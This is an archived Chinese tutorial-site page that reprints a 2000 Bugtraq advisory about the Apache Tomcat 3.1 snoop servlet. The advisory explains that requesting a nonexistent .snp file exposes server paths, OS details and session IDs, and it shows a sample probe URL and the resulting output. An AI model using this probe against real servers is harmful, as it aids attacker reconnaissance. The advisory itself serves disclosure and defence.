📄 0155.htm
字号:
<html>
<head>
<title>新时代软件教程:操作系统 主页制作 服务器 设计软件 网络技术 编程语言 文字编辑</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style>
<!--
body, table {font-size: 9pt; font-family: 宋体}
a {text-decoration:none}
a:hover {color: red;text-decoration:underline}
.1 {background-color: rgb(245,245,245)}
-->
</style>
</head>
<p align="center"><script src="../../1.js"></script></a>
<p align="center"><big><strong>Apache Tomcat Snoop Servlet重要信息暴露漏洞</strong></big></p>
<div align="right">---摘自互联网</div>
<br>bugtraq id 1532 <br>
class Design Error <br>
cve GENERIC-MAP-NOMATCH <br>
remote Yes <br>
local No <br>
published July 20, 2000 <br>
updated August 02, 2000 <br>
vulnerable Apache Group Tomcat 3.1<br>
- Sun Solaris 8.0<br>
- Sun Solaris 7.0<br>
- SGI IRIX 6.5<br>
- SGI IRIX 6.4<br>
- RedHat Linux 6.2 i386<br>
- RedHat Linux 6.1 i386<br>
- NetBSD NetBSD 1.4.2 x86<br>
- NetBSD NetBSD 1.4.1 x86<br>
- MandrakeSoft Linux Mandrake 7.1<br>
- MandrakeSoft Linux Mandrake 7.0<br>
- FreeBSD FreeBSD 5.0<br>
- FreeBSD FreeBSD 4.0<br>
- Digital UNIX 4.0<br>
- Debian Linux 2.2<br>
- Debian Linux 2.1<br>
- Connectiva Linux 5.1<br>
- Caldera OpenLinux 2.4<br>
- BSDI BSD/OS 4.0<br>
Apache Group Tomcat 3.0<br>
<br>
A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks. This information includes full paths, OS information, and other information that may be sensitive.<br>
<br>
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp<br>
====<br>
Snoop Servlet<br>
<br>
Servlet init parameters:<br>
<br>
Context init parameters:<br>
<br>
Context attributes:<br>
javax.servlet.context.tempdir =<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
sun.servlet.workdir =<br>
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples<br>
<br>
Request attributes:<br>
<br>
Servlet Name: snoop<br>
Protocol: HTTP/1.0<br>
Scheme: http<br>
Server Name: narco.goverment.sucks.co<br>
Server Port: 8080 <br>
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX<br>
4.2 POWER_RS; java.vendor=IBM Corporation)<br>
Remote Addr: xxx.xxx.xxx.xxx<br>
Remote Host: xxx.xxx.xxx.xxx<br>
Character Encoding: null<br>
Content Length: -1<br>
Content Type: null<br>
Locale: en<br>
Default Response Buffer: 8192<br>
<br>
Parameter names in this request:<br>
<br>
Headers in this request:<br>
Host: narco.goverment.sucks.co:8080<br>
Accept-Encoding: gzip<br>
Cookie: JSESSIONID=To1212mC7833304641226407At<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,<br>
*/*<br>
Connection: Keep-Alive<br>
Accept-Charset: iso-8859-1,*,utf-8<br>
User-Agent: Mozilla/4.51 [en] (Winsucks; I)<br>
Accept-Language: en<br>
<br>
Cookies in this request:<br>
JSESSIONID = To1212mC7833304641226407At<br>
<br>
Request Is Secure: false<br>
Auth Type: null<br>
HTTP Method: GET<br>
Remote User: null<br>
Request URI: /examples/jsp/snp/anything.snp<br>
Context Path: /examples<br>
Servlet Path: /jsp/snp/anything.snp<br>
Path Info: null<br>
Path Trans: null<br>
Query String: null<br>
<br>
Requested Session Id: To1212mC7833304641226407At<br>
Current Session Id: To1212mC7833304641226407At<br>
Session Created Time: 964047263477<br>
Session Last Accessed Time: 964047528749<br>
Session Max Inactive Interval Seconds: 1800<br>
<br>
Session values: <br>
numguess = num.NumberGuessBean@6bfa9a1
</table>
<p align="center"><script src="../../2.js"></script></a>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -